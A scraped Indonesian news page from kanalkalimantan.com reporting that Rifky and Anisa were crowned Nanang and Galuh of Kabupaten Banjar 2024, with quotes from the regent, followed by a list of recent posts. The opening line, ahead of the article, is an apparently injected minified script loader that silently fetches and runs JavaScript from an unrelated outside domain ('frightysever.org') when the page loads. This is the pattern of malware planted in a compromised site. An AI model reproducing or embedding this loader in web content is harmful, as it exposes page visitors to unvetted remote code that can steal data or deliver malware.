(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Rifky dan Anisa Jadi Nanang dan Galuh Kabupaten Banjar 2024


KANALKALIMANTAN.COM, BANJARBARU – Rifky dan Anisa dinobatkan sebagai Nanang dan Galuh Banjar tahun 2024, pada babak grand final, di Hotel Novotel Banjarbaru, Jumat (5/7/2024) malam.

Nanang Rifky dan Galuh Anisa pun berhak memboyong piala, piagam penghargaan dan sejumlah uang pembinaan yang diserahkan Bupati Banjar H Saidi Mansyur didampingi Ketua TP PKK Kabupaten Banjar Hj Nurgita Tiyas.

Bupati Banjar H Saidi Mansyur mengatakan, sebuah keinganan dari pemerintah daerah untuk memiliki pemuda pemudi yang berkualitas untuk mempromosikan potensi yang dimiliki Kabupaten Banjar guna menyongsong masa depan yang lebih baik.

Baca juga: Fiqih Disabilitas, Teman Tuli Banjarbaru Diajari Salat dan Bacaan Wajib Pakai Isyarat

Atas nama pribadi dan pemerintah daerah bupati menyampaikan terima kasih kepada semua pihak yang telah mensupport hingga terselenggaranya kegiatan, serta sampaikan selamat kepada para finalis.

Menurut Saidi kegiatan tersebut merupakan salah satu upaya untuk generasi muda bisa saling berkoordinasi dan berintegrasi dalam mengusung dunia kepariwisataan, baik di bidang promosi wisata untuk menarik wisatawan maupun dalam bidang destinasi objek wisata yang menjadi tujuan para wisatawan.

“Ini adalah PR-nya, untuk menarik wisatawan. Tak hanya viral, tapi dituntut untuk dampak ekonominya,” tekan Saidi.

Dia menambahkan, menyandang gelar bergengsi adalah sebuah kebanggaan, namun gelar ini akan lebih berarti apabila tidak hanya dirasakan sendiri, akan tetapi semua orang dapat merasakan kontibusi positifnya.

Baca juga: Jago Kandang : Saat Selebriti beradu prestasi dengan Siswa Sekolah!

“Semua finalis agar bisa berkontribusi dan bisa berkolaborasi dengan pemerintah daerah.

Terus menambah ilmu pengetahuan terutama terkait kondisi dan karakter, budaya serta kepariwisataan daerah, provinsi maupun nasional,” pesan dia.

Terkait PR yang disebut Bupati Banjar, Nanang Rifky mengaku siap mengemban amanah tersebut sehingga ke depannya Kabupaten Banjar lebih maju dan terkenal lagi baik nasional maupun internasional.

“Insya Allah saya sanggup apa yang diamanahkan,” ucap dia.

Baca juga: Hiswana Migas Kalsel Tak Temukan Agen dan Pangkalan Nakal

Melaju ke tingkat provinsi pada ajang yang sama, dirinya akan mempersiapkan diri secara maksimal dengan target menjadi yang terbaik.

“Saya akan memberikan yang terbaik bagi Kabupaten Banjar, saya optimistis,” tutup dia. (kanalkalimantan.com/dkispbanjar/kk)

Reporter: kk
Editor: Dhani


Muhammad Andi

Recent Posts

Arti Warna Merah dalam Tradisi Imlek

KANALKALIMANTAN.COM, BANJARMASIN - Dalam perayaan Tahun Baru Imlek, ada banyak warna merah menghiasi segala aspek… Read More

2 jam ago

Ini Makna di Balik Shio Kuda Api Imlek 2026

KANALKALIMANTAN.COM, BANJARMASIN – Kuda Api menjadi shio di tahun baru Imlek 2026. Apa makna di… Read More

5 jam ago

Malam Imlek Penuh Khidmat di Klenteng Karta Raharja Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN – Di bawah kilauan lampion dan lilin yang berjejer rapi, ratusan warga Tionghoa… Read More

6 jam ago

Ini Aturan Warung Makan Selama Ramadan di Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN — Mendekati Ramadan, Wali Kota Banjarmasin H Muhammad Yamin HR mengeluarkan kebijakan pelaksanaan… Read More

23 jam ago

‎Berbagi Semangat Mengaji dengan Dansatgas TMMD di TPA Al Ikhlas

‎KANALKALIMANTAN.COM, AMUNTAI – Senyum tawa anak-anak Desa Hambuku Hulu mewarnai halaman rumah warga yang sementara… Read More

1 hari ago

Hendak Tawuran, 16 Remaja Bawa Sajam Diamankan

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian Sektor (Polsek) Banjarmasin Selatan mengamankan belasan remaja dan sejumlah senjata tajam… Read More

1 hari ago

This website uses cookies.